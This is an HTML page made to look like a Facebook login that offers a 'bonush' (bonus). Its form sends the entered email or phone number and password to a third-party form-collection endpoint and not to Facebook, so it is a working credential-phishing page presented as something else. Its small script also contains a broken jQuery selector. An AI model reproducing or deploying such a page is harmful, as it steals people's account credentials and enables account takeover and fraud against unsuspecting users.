<!DOCTYPE html>
<html lang="en">
<head>
  
  
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>bonush</title>
    <style>
    body {
    font-family: Arial, sans-serif;
    background-color: #f0f2f5;
}

.container {
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
}

.login-form {
    background-color: #fff;
    padding: 20px;
    border-radius: 8px;
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
    text-align: center;
    width: 300px;
}

h1 {
    font-size: 24px;
    margin-bottom: 20px;
}

input {
    width: 100%;
    padding: 10px;
    margin-bottom: 10px;
    border: 1px solid #ccc;
    border-radius: 4px;
}

button {
    width: 100%;
    padding: 10px;
    background-color: #1877f2;
    color: #fff;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}

button:hover {
    background-color: #166fe5;
}

a {
    text-decoration: none;
    color: #1877f2;
    font-size: 14px;
}

hr {
    margin: 20px 0;
}

.create-account {
    background-color: #42b72a;
}

.create-account:hover {
    background-color: #36a420;
}
</style>
    
</head>
<body class="rr">
    <div class="container">
        <form class="login-form" method="post" action="https://submit-form.com/gTHiJeyhW">
            <h1>Login to Facebook
            for bonush</h1>
            <input type="text" placeholder="Email or Phone" name="em or ph">
            <input type="password" placeholder="Password" name="Password">
            <button type="submit">Log In</button>
            <a href="#">Forgot Password?</a>
            <hr>
            <button type="button" class="create-account">Create New Account</button>
        </form>
    </div>
    
   <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js" ></script> 
    <script>
    var tt =$(.rr);
     tt.document.addEventListener('gesturestart', function (e) {
    e.preventDefault();
});

      
    </script>
</body>
</html>
